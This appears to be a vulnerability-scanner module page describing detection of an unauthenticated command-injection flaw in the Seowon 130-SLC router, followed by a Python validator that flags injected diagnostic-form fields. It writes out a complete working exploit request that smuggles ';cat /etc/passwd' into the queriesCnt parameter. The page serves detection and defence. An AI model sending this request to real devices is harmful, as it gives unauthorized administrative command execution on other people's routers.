Seowon 130-SLC router - Remote Code Execution

By kannthu

Critical
Vidoc Module
#unauth #iot #edb #rce #seowon
Description

What is the "Seowon 130-SLC router - Remote Code Execution" module?

The "Seowon 130-SLC router - Remote Code Execution" module is designed to detect a critical vulnerability in the Seowon 130-SLC router. This vulnerability allows remote attackers to execute commands as the admin user without authentication, by sending a request to the router's IP address and port (if available). The severity of this vulnerability is classified as critical, indicating the potential for significant damage if exploited.

This module was authored by gy741.

Impact

If successfully exploited, this vulnerability could allow attackers to gain unauthorized access to the Seowon 130-SLC router and execute arbitrary commands with administrative privileges. This can lead to a complete compromise of the router, enabling further malicious activities such as data theft, network disruption, or unauthorized configuration changes.

How does the module work?

The "Seowon 130-SLC router - Remote Code Execution" module works by sending a crafted HTTP request to the target router. The request includes specific parameters and headers to trigger the vulnerability. The module then checks the response for specific conditions to determine if the vulnerability is present.

One example of an HTTP request used by this module:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded
Referer: /diagnostic.html?t=201701020919
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928

The module then applies matching conditions to the response to determine if the vulnerability is present. These conditions include checking the response body for the presence of the "root:.*:0:0:" pattern and verifying that the HTTP status code is 200.

For more information, please refer to the module's reference.
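
A defender-side check for the request shown above, as an added example that is not part of the Vidoc module or the original page: it flags logged POST bodies in which the Diagnostic form's numeric fields carry anything other than digits. The field list and the assumption that these fields are integer-only are inferred from the sample request, and `suspicious_fields` is a hypothetical helper name.

```python
from urllib.parse import unquote_plus

# Fields that hold plain integers in the request shown above. Assumption: the
# router's diagnostic form never legitimately sends anything else in them.
NUMERIC_FIELDS = ("pingPktSize", "pingTimeout", "pingCount", "maxTTLCnt", "queriesCnt")

def suspicious_fields(body):
    """Return the numeric Diagnostic fields whose decoded value is not an integer."""
    form = {}
    # Split on "&" only: some parsers also split on ";", which would hide the
    # tail of a value such as the queriesCnt one in the request above.
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        form.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    if "Diagnostic" not in form.get("Command", []):
        return []
    bad = []
    for name in NUMERIC_FIELDS:
        # Check every occurrence, so a repeated parameter cannot mask a bad one.
        values = form.get(name, [])
        if any(v and not (v.isascii() and v.isdigit()) for v in values):
            bad.append(name)
    return bad

# Body copied from the request on this page, plus two constructed bodies.
PAGE_BODY = ("Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56"
             "&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30"
             "&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on"
             "&btnApply=Apply&T=1631653402928")
BENIGN_BODY = PAGE_BODY.replace(";cat /etc/passwd", "3")         # constructed
ENCODED_BODY = "Command=Diagnostic&pingCount=4%3B&queriesCnt=3"  # constructed

if __name__ == "__main__":
    for label, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY),
                        ("encoded", ENCODED_BODY)):
        print(label, suspicious_fields(body))
```

The same rule can run in a reverse proxy or over captured request logs in front of the device's web interface; empty values are tolerated because the sample request itself sends a blank `ipAddr`.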

Module preview

Concurrent Requests (1)
1. HTTP Request template
Matching conditions
regex: root:.*:0:0:
and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability